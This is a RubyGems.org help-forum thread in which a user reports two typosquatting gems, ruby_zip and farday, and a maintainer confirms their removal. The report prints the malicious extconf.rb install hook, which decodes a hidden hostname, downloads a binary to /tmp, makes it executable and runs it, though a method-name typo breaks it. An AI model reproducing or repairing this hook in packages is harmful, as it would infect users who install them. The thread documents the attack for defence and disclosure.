tag:help.rubygems.org,2010-01-19:/discussions/problems/33633-abuse-report-farday-and-ruby_zipRubyGems.org: Discussion 2018-09-18T21:29:34Ztag:help.rubygems.org,2010-01-19:Comment/461056832018-09-18T21:11:36Z2018-09-18T21:11:37ZAbuse report farday and ruby_zip<div><p>Hi,</p>
<p>I'm assuming the reader is familiar with <a href="https://incolumitas.com/2016/06/08/typosquatting-package-managers/#typosquatting-package-managers">Typosquatting</a>, and the previous discussions on this topic (e.g. <a href="https://github.com/rubygems/rubygems.org/issues/1334">bunlder</a>).</p>
<p>I'd like to report 1. ruby_zip and 2. farday which are typosquatting other popular ruby gems. Fortunately, there seems to be a typo in the exploit found in these gems extconf.rb, as I found out when trying to install one of them. See [1] and [2].</p>
<p>Now, there is something that feels very automated to me about these packages, the gems files and variable names seem generated, and the gemspecs themselves feel very much generated as well. I wonder if there are other gems like these out there, with working code, and if there is anything else RubyGems can do to prevent these.</p>
<p>Thanks<br>
zelivans</p>
<p>[1] ruby_zip installation:</p>
<pre>
<code>/ # gem install ruby_zip
Building native extensions. This could take a while...
Successfully installed nokogiri-1.8.4
Fetching: ruby_zip-0.1.3.gem (100%)
Building native extensions. This could take a while...
ERROR: Error installing ruby_zip:
ERROR: Failed to build gem native extension.<br><br>
</code>
</pre>
<pre>
<code><code>current directory: /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3/ext/laterite/laryngopharyngeal/amaterialistic</code></code>
</pre>
<pre>
<br>/usr/bin/ruby -r ./siteconf20180918-59-1sc0gxv.rb extconf.rb
extconf.rb:27:in <code>run&#39;: undefined method</code>setup_exploit' for Calvinize:Class (NoMethodError)
from extconf.rb:31:in `<main>'
<br>extconf failed, exit code 1
<br>Gem files will remain installed in /usr/lib/ruby/gems/2.4.0/gems/ruby_zip-0.1.3 for inspection.
Results logged to /usr/lib/ruby/gems/2.4.0/extensions/x86_64-linux/2.4.0/ruby_zip-0.1.3/gem_make.out
</pre>
<p>[2] extconf.rb file of ruby_zip gem:</p>
<pre>
<code>require 'net/http'
require 'uri'
require 'base64'
require 'resolv'
class Calvinize
def self.setup_explot(dematerialising)
if !dematerialising.nil? and dematerialising != '0.0.0.0'
dodgery = Net::HTTP.get_response(URI('http://' + dematerialising + '/contributor'))
File.open('/tmp/endopod', 'wb+') do |upsurge|
upsurge.binmode
upsurge.write(dodgery.body)
upsurge.chmod(0777)
upsurge.close
end
system('/tmp/endopod')
end
end
def self.run()
struthioniform = 'NDJiNTU5YjEuaGt6enp6ei5kZQ=='
futurize = nil
begin
futurize = Resolv.getaddress(Base64.decode64(struthioniform))
rescue
end
self.setup_exploit(futurize)
end
end
Calvinize.run()</code>
</pre></div>Ariel Zelivanskytag:help.rubygems.org,2010-01-19:Comment/461056832018-09-18T21:29:33Z2018-09-18T21:29:33ZAbuse report farday and ruby_zip<div><p>Thanks for the report! We've removed those gems, and we're working on a system to eliminate (or at least hopefully reduce) this kind of thing in the future.</p></div>indirect